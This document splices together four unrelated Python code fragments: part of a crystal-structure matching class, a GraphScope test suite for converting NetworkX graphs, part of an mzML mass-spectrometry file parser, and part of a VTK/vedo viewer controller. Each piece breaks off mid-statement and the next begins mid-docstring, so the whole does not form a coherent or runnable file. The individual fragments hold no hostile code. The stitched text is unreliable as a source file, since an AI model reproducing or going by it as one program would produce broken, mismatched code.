and number of sites in cells differ after a primitive cell reduction (divisible by an integer) attempts to generate a supercell transformation of the smaller cell which is equivalent to the larger structure. allow_subset (bool): Allow one structure to match to the subset of another structure. Eg. Matching of an ordered structure onto a disordered one, or matching a delithiated to a lithiated structure. This option cannot be combined with attempt_supercell, or with structure grouping. comparator (Comparator): A comparator object implementing an equals method that declares declaring equivalency of sites. Default is SpeciesComparator, which implies rigid species mapping, i.e., Fe2+ only matches Fe2+ and not Fe3+. Other comparators are provided, e.g., ElementComparator which matches only the elements and not the species. The reason why a comparator object is used instead of supplying a comparison function is that it is not possible to pickle a function, which makes it otherwise difficult to use StructureMatcher with Python's multiprocessing. supercell_size (str): Method to use for determining the size of a supercell (if applicable). Possible values are num_sites, num_atoms, volume, or an element present in both structures. ignored_species (list): A list of ions to be ignored in matching. Useful for matching structures that have similar frameworks except for certain ions, e.g., Li-ion intercalation frameworks. This is more useful than allow_subset because it allows better control over what species are ignored in the matching. 
""" def __init__(self, ltol=0.2, stol=0.3, angle_tol=5, primitive_cell=True, scale=True, attempt_supercell=False, allow_subset=False, comparator=SpeciesComparator(), supercell_size='num_sites', ignored_species=None): self.ltol = ltol self.stol = stol self.angle_tol = angle_tol self._comparator = comparator self._primitive_cell = primitive_cell self._scale = scale self._supercell = attempt_supercell self._supercell_size = supercell_size self._subset = allow_subset self._ignored_species = [] if ignored_species is None else \ ignored_species[:] def _get_supercell_size(self, s1, s2): """ Returns the supercell size, and whether the supercell should be applied to s1. If fu == 1, s1_supercell is returned as true, to avoid ambiguity. """ if self._supercell_size == 'num_sites': fu = s2.num_sites / s1.num_sites elif self._supercell_size == 'num_atoms': fu = s2.composition.num_atoms / s1.composition.num_atoms elif self._supercell_size == 'volume': fu = s2.volume / s1.volume else: try: el = get_el_sp(self._supercell_size) fu = s2.composition[el] / s1.composition[el] except: raise ValueError('invalid argument for supercell_size') if fu < 2/3: return int(round(1/fu)), False else: return int(round(fu)), True def _get_lattices(self, target_lattice, s, supercell_size=1): """ Yields lattices for s with lengths and angles close to the lattice of target_s. 
If supercell_size is specified, the returned lattice will have that number of primitive cells in it Args: s, target_s: Structure objects """ lattices = s.lattice.find_all_mappings( target_lattice, ltol=self.ltol, atol=self.angle_tol, skip_rotation_matrix=True) for l, _, scale_m in lattices: if abs(abs(np.linalg.det(scale_m)) - supercell_size) < 0.5: yield l, scale_m def _get_supercells(self, struct1, struct2, fu, s1_supercell): """ Computes all supercells of one structure close to the lattice of the other if s1_supercell == True, it makes the supercells of struct1, otherwise it makes them of s2 yields: s1, s2, supercell_matrix, average_lattice, supercell_matrix """ def av_lat(l1, l2): params = (np.array(l1.lengths_and_angles) + np.array(l2.lengths_and_angles)) / 2 return Lattice.from_lengths_and_angles(*params) def sc_generator(s1, s2): s2_fc = np.array(s2.frac_coords) if fu == 1: cc = np.array(s1.cart_coords) for l, sc_m in self._get_lattices(s2.lattice, s1, fu): fc = l.get_fractional_coords(cc) fc -= np.floor(fc) yield fc, s2_fc, av_lat(l, s2.lattice), sc_m else: fc_init = np.array(s1.frac_coords) for l, sc_m in self._get_lattices(s2.lattice, s1, fu): fc = np.dot(fc_init, np.linalg.inv(sc_m)) lp = lattice_points_in_supercell(sc_m) fc = (fc[:, None, :] + lp[None, :, :]).reshape((-1, 3)) fc -= np.floor(fc) yield fc, s2_fc, av_lat(l, s2.lattice), sc_m if s1_supercell: for x in sc_generator(struct1, struct2): yield x else: for x in sc_generator(struct2, struct1): # reorder generator output so s1 is still first yield x[1], x[0], x[2], x[3] def _cmp_fstruct(self, s1, s2, frac_tol, mask): """ Returns true if a matching exists between s2 and s2 under frac_tol. 
s2 should be a subset of s1 """ if len(s2) > len(s1): raise ValueError("s1 must be larger than s2") if mask.shape != (len(s2), len(s1)): raise ValueError("mask has incorrect shape") return is_coord_subset_pbc(s2, s1, frac_tol, mask) def _cart_dists(self, s1, s2, avg_lattice, mask, normalization, lll_frac_tol=None): """ Finds a matching in cartesian space. Finds an additional fractional translation vector to minimize RMS distance Args: s1, s2: numpy arrays of fractional coordinates. len(s1) >= len(s2) avg_lattice: Lattice on which to calculate distances mask: numpy array of booleans. mask[i, j] = True indicates that s2[i] cannot be matched to s1[j] normalization (float): inverse normalization length Returns: Distances from s2 to s1, normalized by (V/Natom) ^ 1/3 Fractional translation vector to apply to s2. Mapping from s1 to s2, i.e. with numpy slicing, s1[mapping] => s2 """ if len(s2) > len(s1): raise ValueError("s1 must be larger than s2") if mask.shape != (len(s2), len(s1)): raise ValueError("mask has incorrect shape") # vectors are from s2 to s1 vecs, d_2 = pbc_shortest_vectors(avg_lattice, s2, s1, mask, return_d2=True, lll_frac_tol=lll_frac_tol) lin = LinearAssignment(d_2) s = lin.solution short_vecs = vecs[np.arange(len(s)), s] translation = np.average(short_vecs, axis=0) f_translation = avg_lattice.get_fractional_coords(translation) new_d2 = np.sum((short_vecs - translation) ** 2, axis=-1) return new_d2 ** 0.5 * normalization, f_translation, s def _get_mask(self, struct1, struct2, fu, s1_supercell): """ Returns mask for matching struct2 to struct1. 
If struct1 has sites a b c, and fu = 2, assumes supercells of struct2 will be ordered aabbcc (rather than abcabc) Returns: mask, struct1 translation indices, struct2 translation index """ mask = np.zeros((len(struct2), len(struct1), fu), dtype=np.bool) inner = [] for sp2, i in itertools.groupby(enumerate(struct2.species_and_occu), key=lambda x: x[1]): i = list(i) inner.append((sp2, slice(i[0][0], i[-1][0]+1))) for sp1, j in itertools.groupby(enumerate(struct1.species_and_occu), key=lambda x: x[1]): j = list(j) j = slice(j[0][0], j[-1][0]+1) for sp2, i in inner: mask[i, j, :] = not self._comparator.are_equal(sp1, sp2) if s1_supercell: mask = mask.reshape((len(struct2), -1)) else: # supercell is of struct2, roll fu axis back to preserve # correct ordering mask = np.rollaxis(mask, 2, 1) mask = mask.reshape((-1, len(struct1))) # find the best translation indices i = np.argmax(np.sum(mask, axis=-1)) inds = np.where(np.invert(mask[i]))[0] if s1_supercell: # remove the symmetrically equivalent s1 indices inds = inds[::fu] return np.array(mask, dtype=np.int_), inds, i def fit(self, struct1, struct2): """ Fit two structures. Args: struct1 (Structure): 1st structure struct2 (Structure): 2nd structure Returns: True or False. """ struct1, struct2 = self._process_species([struct1, struct2]) if not self._subset and self._comparator.get_hash(struct1.composition) \ != self._comparator.get_hash(struct2.composition): return None struct1, struct2, fu, s1_supercell = self._preprocess(struct1, struct2) match = self._match(struct1, struct2, fu, s1_supercell, break_on_match=True) if match is None: return False else: return match[0] <= self.stol def get_rms_dist(self, struct1, struct2): """ Calculate RMS displacement between two structures Args: struct1 (Structure): 1st structure struct2 (Structure): 2nd structure Returns: rms displacement normalized by (Vol / nsites) ** (1/3) and maximum distance between paired sites. If no matching lattice is found None is returned. 
""" struct1, struct2 = self._process_species([struct1, struct2]) struct1, struct2, fu, s1_supercell = self._preprocess(struct1, struct2) match = self._match(struct1, struct2, fu, s1_supercell, use_rms=True, break_on_match=False) if match is None: return None else: return match[0], max(match[1]) def _process_species(self, structures): copied_structures = [] for s in structures: # We need the copies to be actual Structure to work properly, not # subclasses. So do type(s) == Structure. ss = s.copy() if type(s) == Structure else \ Structure.from_sites(s) if self._ignored_species: ss.remove_species(self._ignored_species) copied_structures.append(ss) return copied_structures def _preprocess(self, struct1, struct2, niggli=True): """ Rescales, finds the reduced structures (primitive and niggli), and finds fu, the supercell size to make struct1 comparable to s2 """ struct1 = struct1.copy() struct2 = struct2.copy() if niggli: struct1 = struct1.get_reduced_structure(reduction_algo="niggli") struct2 = struct2.get_reduced_structure(reduction_algo="niggli") # primitive cell transformation if self._primitive_cell: struct1 = struct1.get_primitive_structure() struct2 = struct2.get_primitive_structure() if self._supercell: fu, s1_supercell = self._get_supercell_size(struct1, struct2) else: fu, s1_supercell = 1, True mult = fu if s1_supercell else 1/fu # rescale lattice to same volume if self._scale: ratio = (struct2.volume / (struct1.volume * mult)) ** (1 / 6) nl1 = Lattice(struct1.lattice.matrix * ratio) struct1.modify_lattice(nl1) nl2 = Lattice(struct2.lattice.matrix / ratio) struct2.modify_lattice(nl2) return struct1, struct2, fu, s1_supercell def _match(self, struct1, struct2, fu, s1_supercell=True, use_rms=False, break_on_match=False): """ Matches one struct onto the other """ ratio = fu if s1_supercell else 1/fu if len(struct1) * ratio >= len(struct2): return self._strict_match( struct1,
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import pytest from networkx.exception import NetworkXError import graphscope import graphscope.nx as nx from graphscope.client.session import g from graphscope.client.session import get_default_session from graphscope.framework.errors import InvalidArgumentError from graphscope.framework.loader import Loader from graphscope.proto import graph_def_pb2 def ldbc_sample_single_label(prefix, directed): graph = graphscope.g(directed=directed, generate_eid=False) graph = graph.add_vertices( Loader(os.path.join(prefix, "comment_0_0.csv"), delimiter="|"), "comment" ) graph = graph.add_edges( Loader(os.path.join(prefix, "comment_replyOf_comment_0_0.csv"), delimiter="|"), "replyOf", ) return graph def ldbc_sample_string_oid(prefix, directed): graph = graphscope.g(directed=directed, oid_type="string", generate_eid=False) graph = graph.add_vertices( Loader(os.path.join(prefix, "comment_0_0.csv"), delimiter="|"), "comment" ) graph = graph.add_edges( Loader(os.path.join(prefix, "comment_replyOf_comment_0_0.csv"), delimiter="|"), "replyOf", ) return graph def ldbc_sample_single_label_with_sess(sess, prefix, directed): graph = sess.g(directed=directed, generate_eid=False) graph = graph.add_vertices( Loader(os.path.join(prefix, "comment_0_0.csv"), delimiter="|"), "comment" ) graph = graph.add_edges( 
Loader(os.path.join(prefix, "comment_replyOf_comment_0_0.csv"), delimiter="|"), "replyOf", ) return graph def ldbc_sample_multi_labels(prefix, directed): graph = graphscope.g(directed=directed, generate_eid=False) graph = ( graph.add_vertices( Loader(os.path.join(prefix, "comment_0_0.csv"), delimiter="|"), "comment", ["creationDate", "locationIP", "browserUsed", "content", "length"], ) .add_vertices( Loader(os.path.join(prefix, "person_0_0.csv"), delimiter="|"), "person", [ "firstName", "lastName", "gender", ("birthday", str), "creationDate", "locationIP", "browserUsed", ], ) .add_vertices( Loader(os.path.join(prefix, "post_0_0.csv"), delimiter="|"), "post", [ "imageFile", "creationDate", "locationIP", "browserUsed", "language", "content", "length", ], ) ) graph = ( graph.add_edges( Loader( os.path.join(prefix, "comment_replyOf_comment_0_0.csv"), delimiter="|" ), "replyOf", src_label="comment", dst_label="comment", ) .add_edges( Loader(os.path.join(prefix, "person_knows_person_0_0.csv"), delimiter="|"), "knows", ["creationDate"], src_label="person", dst_label="person", ) .add_edges( Loader(os.path.join(prefix, "comment_replyOf_post_0_0.csv"), delimiter="|"), "replyOf2", src_label="comment", dst_label="post", ) ) return graph def load_p2p(prefix, directed): graph = graphscope.load_from( edges={ "group": { "loader": Loader( os.path.join(prefix, "p2p-31.e"), header_row=False, delimiter=" " ) } }, directed=directed, generate_eid=False, ) return graph @pytest.mark.usefixtures("graphscope_session") class TestGraphTransformation(object): @classmethod def setup_class(cls): cls.NXGraph = nx.Graph cls.data_dir = os.path.expandvars("${GS_TEST_DIR}/ldbc_sample") cls.single_label_g = ldbc_sample_single_label(cls.data_dir, False) cls.multi_label_g = ldbc_sample_multi_labels(cls.data_dir, False) cls.p2p = load_p2p(os.path.expandvars("${GS_TEST_DIR}"), False) cls.p2p_nx = nx.read_edgelist( os.path.expandvars("${GS_TEST_DIR}/dynamic/p2p-31_dynamic.edgelist"), nodetype=int, 
data=True, ) cls.str_oid_g = ldbc_sample_string_oid(cls.data_dir, False) @classmethod def teardown_class(cls): cls.single_label_g.unload() cls.multi_label_g.unload() cls.str_oid_g.unload() def assert_convert_success(self, gs_g, nx_g): assert gs_g.is_directed() == nx_g.is_directed() assert self._schema_equal(gs_g.schema, nx_g.schema) def _schema_equal(self, gs_schema, nx_schema): v_props = {} for entry in gs_schema._valid_vertex_labels(): for prop in entry.properties: v_props[prop.name] = prop.type e_props = {} for entry in gs_schema._valid_edge_labels(): for prop in entry.properties: e_props[prop.name] = prop.type gs_v_props = { prop.name: prop.type for prop in list(nx_schema._valid_vertex_labels())[0].properties } gs_e_props = { prop.name: prop.type for prop in list(nx_schema._valid_edge_labels())[0].properties } return v_props == gs_v_props and e_props == gs_e_props # nx to gs def test_empty_nx_to_gs(self): empty_nx_g = self.NXGraph(dist=True) gs_g = g(empty_nx_g) self.assert_convert_success(gs_g, empty_nx_g) def test_only_contains_nodes_nx_to_gs(self): nx_g = self.NXGraph(dist=True) nx_g.add_nodes_from(range(100), type="node") gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_simple_nx_to_gs(self): nx_g = nx.complete_graph(10, create_using=self.NXGraph) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_int_node_nx_to_gs(self): nx_g = self.NXGraph(dist=True) nx_g.add_nodes_from(range(10), foo="star") nx_g.add_edges_from( [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, 6), (6, 7), (7, 8), (8, 9)], weight=3.14, ) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_str_node_nx_to_gs(self): nx_g = nx.les_miserables_graph() gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_complete_nx_to_gs(self): # multi-propery, node propery and edge propty both aligned nodes = [ (0, {"vp1": 1, "vp2": "v", "vp3": 3.14}), (1, {"vp1": 1, "vp2": "v", "vp3": 3.14}), (2, {"vp1": 1, "vp2": "v", "vp3": 3.14}), ] edges = [ (0, 1, {"ep1": 1, 
"ep2": "e", "ep3": 3.14}), (0, 2, {"ep1": 1, "ep2": "e", "ep3": 3.14}), (1, 2, {"ep1": 1, "ep2": "e", "ep3": 3.14}), ] nx_g = self.NXGraph(dist=True) nx_g.update(edges, nodes) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # node property aliged, edge not aliged nx_g2 = nx_g.copy() nx_g2.add_edge(0, 1, ep4="new propery") gs_g2 = g(nx_g2) self.assert_convert_success(gs_g2, nx_g2) # edge property aliged, node not aliged nx_g3 = nx_g.copy() nx_g3.add_node(2, vp4="new propery") gs_g3 = g(nx_g3) self.assert_convert_success(gs_g3, nx_g3) # both not aliged nx_g4 = nx_g.copy() nx_g4.add_edge(0, 1, ep4="new propery") nx_g4.add_node(2, vp4="new propery") gs_g4 = g(nx_g4) self.assert_convert_success(gs_g4, nx_g4) def test_nx_to_gs_after_modify(self): nx_g = self.NXGraph(dist=True) nodes = [ (0, {"vp1": 1, "vp2": "v", "vp3": 3.14}), (1, {"vp1": 1, "vp2": "v", "vp3": 3.14}), (2, {"vp1": 1, "vp2": "v", "vp3": 3.14}), ] # add nodes nx_g.add_nodes_from(nodes) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # add_edges edges = [ (0, 1, {"ep1": 1, "ep2": "e", "ep3": 3.14}), (0, 2, {"ep1": 1, "ep2": "e", "ep3": 3.14}), (1, 2, {"ep1": 1, "ep2": "e", "ep3": 3.14}), ] nx_g.add_edges_from(edges) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # remove edge nx_g.remove_edge(0, 1) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # remove node nx_g.remove_node(0) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # clear nx_g.clear() gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_nx_to_gs_remove_nodes(self): nx_g = self.NXGraph(dist=True) nx_g.add_nodes_from(range(10)) # all nodes are int gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # success nx_g.add_node("str_node") # add a str node with pytest.raises( RuntimeError, match="The vertex type is not consistent <class 'int'> vs <class 'str'>, can not convert it to arrow graph", ): gs_g = g(nx_g) # mixing oid type, failed nx_g.remove_node("str_node") # remove str node, all nodes are int 
again gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # success def test_error_on_view_to_gs(self): nx_g = self.NXGraph(dist=True) nx_g._graph = None # graph view always has a _graph attribute nx_g._is_client_view = False with pytest.raises(TypeError, match="graph view can not convert to gs graph"): gs_g = g(nx_g) def test_error_on_mixing_node_nx_to_gs(self): nx_g = self.NXGraph(dist=True) nx_g.add_node(0, weight=1.23) nx_g.add_node("zakky", foo="node") with pytest.raises( RuntimeError, match="The vertex type is not consistent <class 'int'> vs <class 'str'>, can not convert it to arrow graph", ): gs_g = g(nx_g) # gs to nx def test_empty_gs_to_nx(self): empty_nx = self.NXGraph(dist=True) empty_gs_graph = g(empty_nx) G = self.NXGraph(empty_gs_graph) self.assert_convert_success(empty_gs_graph, G) def test_single_label_gs_to_nx(self): G = self.NXGraph(self.single_label_g) assert G.number_of_nodes() == 76830 assert G.number_of_edges() == 38786 assert 618475290625 not in G assert ("comment", 618475290625) in G G2 = self.NXGraph(self.single_label_g, default_label="comment") assert G2.number_of_nodes() == 76830 assert G2.number_of_edges() == 38786 assert 618475290625 in G2 assert ("comment", 618475290625) not in G2 def test_multi_label_gs_to_nx(self): G = self.NXGraph(self.multi_label_g) assert G.number_of_nodes() == (76830 + 903 + 78976) assert G.number_of_edges() == (38786 + 6626 + 38044) assert 618475290625 not in G # comment node is (label, id) format assert ("comment", 618475290625) in G assert 933 not in G # person node is (label, id) format assert ("person", 933) in G assert 618475290624 not in G # post node is (label, id) format assert ("post", 618475290624) in G G2 = self.NXGraph(self.multi_label_g, default_label="comment") assert G2.number_of_nodes() == (76830 + 903 + 78976) assert G2.number_of_edges() == (38786 + 6626 + 38044) assert 618475290625 in G2 # comment node is default label node assert ("comment", 618475290625) not in G2 assert 933 not in G2 # 
person node is (label, id) format assert ("person", 933) in G2 assert 618475290624 not in G2 # post node is (label, id) format assert ("post", 618475290624) in G @pytest.mark.skipif( os.environ.get("DEPLOYMENT", None) == "standalone", reason="FIXME(weibin): ci runner failed", ) def test_report_methods_on_copy_on_write_strategy(self): G = self.NXGraph(self.multi_label_g, default_label="person") assert G.graph_type == graph_def_pb2.ARROW_PROPERTY # test NODE_NUM and EDGE_NUM assert G.number_of_nodes() == (76830 + 903 + 78976) assert G.number_of_edges() == (38786 + 6626 + 38044) # test HAS_NODE and HAS_EDGE assert 0 not in G assert 933 in G assert ("person", 933) not in G # deault node must be non-tuple format assert ("random", 933) not in G assert G.has_edge(933, 4398046511628) assert G.has_edge(("comment", 618475290625), ("post", 618475290624)) assert not G.has_edge(933, ("post", 618475290624)) # test GET_NODE_DATA and GET_EDGE_DATA assert G.get_node_data(933) == { "browserUsed": "Firefox", "locationIP": "172.16.58.3", "creationDate": "2010-02-14T15:32:10.447+0000", "birthday": "1989-12-03", "gender": "male", "lastName": "Perera", "firstName": "Mahinda", } assert G.get_edge_data(933, 4398046511628) == { "creationDate": "2010-07-30T15:19:53.298+0000", } assert sorted(list(G.neighbors(933))) == [ 4398046511628, 8796093023017, 28587302322537, ] if G.is_directed(): assert sorted(list(G.predecessors(4398046511628))) == [ 318, 933, 987, 2199023256530, ] G.add_node(0) # modify graph to make copy on write assert G.graph_type == graph_def_pb2.DYNAMIC_PROPERTY assert G.number_of_nodes() == (76831 + 903 + 78976) assert G.number_of_edges() == (38786 + 6626 + 38044) # test HAS_NODE and HAS_EDGE assert 0 in G assert 933 in G assert ("person", 933) not in G assert ("random", 933) not in G assert G.has_edge(933, 4398046511628) assert G.has_edge(("comment", 618475290625), ("post", 618475290624)) assert not G.has_edge(618475290625, ("post", 618475290624)) # test GET_NODE_DATA and 
GET_EDGE_DATA assert G.get_node_data(933) == { "browserUsed": "Firefox", "locationIP":
'SRM spectrum', } othertypes = { # other accession keys (non-MS) 'MS:1000620': 'PDA spectrum', 'MS:1000804': 'electromagnetic radiation spectrum', 'MS:1000805': 'emission spectrum', 'MS:1000806': 'absorption spectrum', } out = {} if isinstance(hand, CVParameterSet): # handed a cvparam class object (expected) p = hand else: # handed a tree or branch (generate the cvparam class object) p = CVParameterSet(hand) for acc in p.keys() & mstypes.keys(): # check for ms spectrum out['acc'] = acc # accession code out['name'] = mstypes[acc] # name of spectrum out['type'] = 'MS' # it is a mass spectrum out['level'] = p['MS:1000511'].value # ms level out['window'] = [p['MS:1000501'].value, p['MS:1000500'].value] # scan window if 'MS:1000129' in p: # negative scan out['mode'] = '-' elif 'MS:1000130' in p: # positive scan out['mode'] = '+' if 'MS:1000827' in p: # if there is an isolation window target m/z out['target'] = p['MS:1000827'].value # if MSn > 2, not sure how to handle this (will have to be hard coded later as I have no examples) elif out['level'] > 2: raise ValueError( 'This script has not been coded to handle MSn > 2, please contact the author of the class') return out for acc in p.keys() & othertypes.keys(): # if the scan is something else out['acc'] = acc # accession code out['name'] = othertypes[acc] # name of spectrum if 'MS:1000804' in p: # if it is a UV-Vis out['type'] = 'UV' else: # other other type (not handled by script) raise KeyError( 'The script has not been coded to handle spectra types other than MS and UV-Vis. ' 'Please contact the authors to get this functionality included.') return out class mzML(object): def __init__(self, filename: str, verbose: bool = True, precision: int = 64, compression: bool = True, gzip_file: bool = True, obo: str = None, ftt: bool = False, **kwargs ): """ A class for loading and extracting data from an mzML file. :param str filename: The name of the mzML or mass spectrometric data file. 
Accepted file types are listed below, and this script can automatically convert some proprietary file types to mzML by calling ProteoWizard (see notes). :param bool verbose: Chatty enable or disable. It can be useful to enable this when processing large files or long acquisitions, as many of the methods have progress reporters. :param int precision: The floating point precision to use if converting to mzML. Default 64 (although this appears to have a minimal effect in the experience of the author). This can be set to 32 to decrease mzML file sizes. :param bool compression: Whether or not to compress the mzML files when converting. This can decrease file sizes at a slight cost in processing time. :param bool gzip: Whether or not to gzip the mzML files when converting. This substantially decreases file sizes (mass spectrometric data compresses very well when gzipped). This will slightly increase processing time. :param str obo: A specific path or URL to an *.obo file defining the accession keys used in mzML files. If this is not specified, the default accession URL will be used to download the required obo file. This should not be necessary normally, as most of the commonly encountered accession keys are hard-coded into this script. The script will raise an error if it encounters an undefined accession key. :param bool ftt: Whether to run the function_timetic() method on initialization. This is useful if you require access to the total ion current and time lists for each function in the mzML file. This does increase file load times quite significantly (~6x slower). **Notes** An mzML file is a data format for mass spectrometric data which can be parsed by python (avoiding the pitfalls associated with the proprietary files usually generated by the mass spectrometers themselves). The mzML file structures are expected to conform to those outlined in the HUPO Proteomics Standards Working Group. 
More information can be found at https://raw.githubusercontent.com/HUPO-PSI/psi-ms-CV/master/psi-ms.obo If you wish to use the format conversion functionality of this script, you will need to download and install ProteoWizard, which can be found at http://proteowizard.sourceforge.net/ """ # store keyword settings self.verbose = verbose self.precision = precision self.compression = compression self.gzip_file = gzip_file self.obo = obo self.filename = self.check_for_file(filename) # load file and determine key properties if self.verbose is True: # todo why is this not an instantiation self.Progress = Progress sys.stdout.write('Loading %s into memory' % self.filename) sys.stdout.flush() if self.filename.lower().endswith('.mzml.gz'): # if mzml is gzipped handle = gzip.open(self.filename) # unzip the file else: handle = self.filename try: self.tree = xml.dom.minidom.parse(handle) # full mzML file except: raise IOError( 'The mzML file "%s" could not be loaded. The file is either unsupported, corrupt, or incomplete.' 
% self.filename) self.nscans = int(self.tree.getElementsByTagName('spectrumList')[0].getAttribute('count')) # number of spectra self.nchroms = int( self.tree.getElementsByTagName('chromatogramList')[0].getAttribute('count')) # number of chromatograms self.functions = {} for spectrum in self.tree.getElementsByTagName('spectrum'): func, proc, scan = fps(spectrum) # extract each value and convert to integer if func not in self.functions: # if function is not defined yet p = branch_cvparams(spectrum) # pull spectrum's cvparameters self.functions[func] = { 'sr': [int(spectrum.getAttribute('index')), None], # the scan index range that the function spans 'nscans': 1, # number of scans } self.functions[func].update(scan_properties(p)) # update with scan properties else: self.functions[func]['sr'][1] = int( spectrum.getAttribute('index')) # otherwise set the scan index range to the current index self.functions[func]['nscans'] += 1 p = branch_cvparams(spectrum) # pull properties of final spectrum self.duration = p['MS:1000016'].value # final start scan time if self.verbose is True: sys.stdout.write(' DONE\n') self.BE = BoundsError() # load warning instance for integration self.ftt = False if ftt is True: self.function_timetic() def __str__(self): """The string that is returned when printed""" return f'{self.__class__.__name__} {self.nscans} spectra, {self.nchroms} chromatograms' def __repr__(self): """The representation that is returned""" return "%s('%s')" % (self.__class__.__name__, self.filename) def __len__(self): return self.nscans def __getitem__(self, ind): """retrieves a scan or summed scans""" if isinstance(ind, slice): # if getitem is trying to slice """ returns the summed scans with the supplied indicies slice will assume that the intended function is 1 """ if ind.start is None: # no start start = 0 else: start = ind.start if ind.stop is None: # no stop stop = self.functions[1]['sr'][1] else: stop = ind.stop return self.sum_scans(start, stop, mute=True) elif 
type(ind) is int: # scan index number """will return the spectrum of the scan index provided""" if ind < 0 or ind > self.nscans: raise IndexError("The scan index number #%d is outside of the mzML's scan index range (0-%d)" % ( ind, self.nscans - 1)) for spectrum in self.tree.getElementsByTagName('spectrum'): attr = branch_attributes(spectrum) if attr['index'] == ind: return extract_spectrum(spectrum) elif type(ind) is float: # timepoint in function 1 """float will assume the intended function was 1""" if ind < 0 or ind > self.duration: raise ValueError( "The supplied time %.3f is outside of this file's time range (0 - %.3f)" % (ind, self.duration)) ind = self.scan_index(ind) for spectrum in self.tree.getElementsByTagName('spectrum'): attr = branch_attributes(spectrum) if attr['index'] == ind: return extract_spectrum(spectrum) def foreachchrom(self, fn): """ a decorator function that will apply the supplied function to every chromatogram in the mzml file the supplied function will be handed the chromatogram XML object as the first argument the decorated function will return a list of outputs of the supplied function where each index corresponds to a scan e.g.:: loaded = mzML(filename) @loaded.foreachchrom def do_this(chrom): # extract the attributes using the mzML.attributes() method attr = loaded.attributes(chrom) return attr['id'] # return the name of the chromatogram do_this() """ def foreachchrom(*args, **kwargs): """decorates the supplied function to run for every scan""" prog = Progress(string='Applying function "%s" to chromatogram' % fn.__name__, last=self.nchroms) out = [] for chromatogram in self.tree.getElementsByTagName('chromatogram'): if self.verbose is True: prog.write(int(chromatogram.getAttribute('index')) + 1) out.append(fn(chromatogram, *args, **kwargs)) if self.verbose is True: prog.fin() return out return foreachchrom def foreachscan(self, fn): """ a decorator function that will apply the supplied function to every spectrum in the mzml file the 
supplied function
:param context: Context of the visualization :param embed_ui: Whether the UI is embed within the VTK window :param embed_font_size: Embed font size. Defaults to 16 points. You might need larger values in case you have a small screen with high dpi (but VTK methods fail to detect that). :param jupyter: Whether we're running from a jupyter notebook or not :param offscreen: Whether the rendering is done offscreen (headless) or not :param plot: A vedo Plotter instance. You can either create it by yourself before hand, in case you want to have multiple windows with other stats or let the controller create a new one :param plot_window_id: Sub-window id where the 3D visualization will be displayed :param num_windows: Number of subwindows, in case you want to display your own stuff later :param render: Whether rendering occurs at the end of the initialization or not. Defaults to False :param dark_mode: Whether the viewer is in dark mode :param auto_select_first_object: Auto select the first object displayed :param silent: Whether printing to console is disabled or not """ self.silent = silent if not silent: print('IBL Viewer...') self.model.ui.font_size = embed_font_size self.model.web_ui = jupyter if self.model.web_ui: vedo.embedWindow('ipyvtk') self.plot = plot window_size = self.model.web_window_size if self.model.web_ui else self.model.window_size if plot is None: self.plot = vedo.Plotter(N=num_windows, size=window_size, title=self.model.title, bg=self.model.ui.background_color, offscreen=offscreen or jupyter) self.plot_window_id = plot_window_id self.plot.window.SetSize(*window_size) self.set_renderer() self.set_dark_mode(dark_mode, False) ''' if jupyter: self.plot.offscreen = offscreen if offscreen is not None else offscreen is None self.plot.window.SetOffScreenRendering(self.plot.offscreen) ''' try: # In cases where we are headless, this will fail because there is no interactor # but in cases where a headless window is embed into an app like Qt, this will work # So 
everything's fine like this self.initialize_window_interactions() except Exception: pass self.model.ui.embed = embed_ui if self.model.ui.embed: self.model.ui.visible = True self.model.ui.set_context(UIModel.DEFAULT) self.initialize_vtk_ui(self.model.ui.embed_menu_x, self.model.ui.embed_menu_y) self.update_ui() # Generic UI part: prepares the cursor and draws a box outline on the selected object self.initialize_selection_ui() self.initialized() #logging.info('Initialization complete.') def initialize_window_interactions(self): """ Initialize window interactions on the VTK window """ # LeftButtonReleaseEvent does not work. You have to use EndInteractionEvent instead (go figure...) # see https://stackoverflow.com/questions/52209534 self.add_callback('LeftButtonPressEvent', self.handle_left_mouse_press) self.add_callback('EndInteractionEvent', self.handle_left_mouse_release) self.plot.interactor.AddObserver('TimerEvent', self.handle_timer) self.plot.interactor.AddObserver('KeyPressEvent', self.handle_key_press) def initialize_selection_ui(self): """ Initialize selection marker and text """ #if self.model.ui.embed: self.selection_info = self.add_text('selection_info', '', [0.02, 0.95], color=self.model.ui.color) self.plot.add(self.selection_info, render=False) self.set_selection_marker() def handle_key_press(self, iren, event): """ Handle key press events :param iren: vtk iren :param event: vtk event """ key = iren.GetKeySym().lower() if 'esc' in key: iren.ExitCallback() elif 'space' in key: self.clear_line_widget() self.clear_box_widget() def exit_interactive_mode(self): """ Exit/leave interactive mode """ self.plot.window.ExitCallback() def toggle_dark_mode(self): """ Toggle dark/light mode """ self.set_dark_mode(not self.model.ui.dark_mode) def set_dark_mode(self, on=True, update_ui=True): """ Set dark mode on or off """ self.model.ui.set_dark_mode(on) if self.plot is not None: self.plot.backgroundColor(self.model.ui.background_color) if self.color_bar is not None: 
